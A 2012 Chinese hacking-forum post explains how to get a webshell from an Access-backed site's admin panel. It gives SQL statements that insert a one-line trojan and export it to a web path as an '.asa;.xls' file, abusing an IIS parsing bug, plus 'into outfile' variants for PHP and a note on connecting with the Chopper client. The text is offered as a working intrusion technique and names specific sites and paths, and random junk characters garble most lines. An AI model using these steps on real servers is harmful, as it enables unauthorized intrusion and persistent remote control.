找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2034|回复: 0
打印 上一主题 下一主题

ACCESS执行SQL命令导出一句话SHELL

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 17:53:58 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
好不容易进了后台,发现啥上传啊。备份啊多木有。
- V+ F( A* M# |9 u7 A/ w) uwebshell一直拿不到。后来翻了一下源码。有一个执行SQL命令的! R" Y+ L5 B5 d' R4 F1 m$ a& T  e
文件。可后台没显示这功能。直接填上文件名字,执行命令的选项出来了,
& ]/ e0 Q2 t: T然后就试用了下面的命令导出一句话木马。没想到成功了。命令方法如下:' p, q  f$ f4 ^
1.create table cmd (a varchar(50))
$ A: ]2 Y8 S0 A6 O7 ]! w2.insert into cmd (a) values (‘‘)% \' Q% \" K$ f  S
3.select * into [a] in ‘D:\wwwroot\www.koohik.com\hacker.asa;.xls’ ‘excel 4.0;’ from cmd  L8 D) r3 o. H' D2 g" H- B
(把表cmd的内容导出为物理路径的一个EXCEL文件)) B4 |4 _: K  N8 {
4.drop table cmd
: e* H0 x- ?1 P+ R: C# P利用IIS的BUG成功拿到了WEBSHELL。
! s8 B7 h% i) v
: {5 h( T9 m% {% ^直接菜刀里连接http://www.chouwazi.com/data/xiao.asp;xiao.xls一句话
( o0 y8 J& r& q9 M5 y! C5 n) G0 n% H6 b
  SQL语句意思解释:
5 \, w2 j3 E$ ?  第一句0 i7 i5 x; i$ P' Q& d$ ]
  建立一个有一个A字段的表 表名为cmd 字段类型为字符 长度为50) e; ?9 s( `2 A  V% _4 u5 d$ v$ n

# w) q' f- Y* c# v7 z) I4 X4 I# |  第二句
6 _7 L0 l9 i* \& Z7 E! @$ B9 |* v  在表cmd的a字段插入一句话木马
2 {, v' X0 ?/ ?" N  第三句
& X; }7 t/ K4 I( C* V  i- P3 f  把cmd表a的内容导出到路径e:\host\chouwazi.com\web\data\的EXCEL文件! Z9 v# H' E/ d- d0 i  Y

& P' H3 z  {) |. i2 e: V- K  第四句
5 c0 l& L. d6 a, w  删除建立的cmd表
) L/ x+ h) v! z/ f$ e3 s1 s8 h  o
( @: m! Y  _: I/ y3 f3 C  以下内容为测试:7 f( _) y& V7 |
  Access利用后台SQL执行命令功能导出WebShell:
% @( Z) K* t& Q1 Z0 c/ \. P  这个更简单:9 P. W3 w! l% ^( G. }2 ^! q% D
  [ol][li]Select 'asp一句话木马' into [vote] in 'd:/chouwazi.com/x.asp;.xls' 'excel 8.0;' from vote [/li][/ol]
! g0 S9 |3 v  d" {( w6 j  或者
3 W2 }% k& |3 |: X. K4 l, n2 j0 H& C  [ol][li]Select 'php一句话木马' into outfile 'F:/wwwroot/chouwazi.com/eval.php'; [/li][/ol]8 z! u; ?+ b! Q' y- q

% @. K5 b9 \' o* L& r6 O4 l) B. V2 P  后台有执行SQL语句功能(vote为已知表段): D' v* A4 \1 s" }& x
  希望对大家有所帮助拿shell的又一个思路
8 _6 d0 v3 q2 s6 a, n1 r! T3 J
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表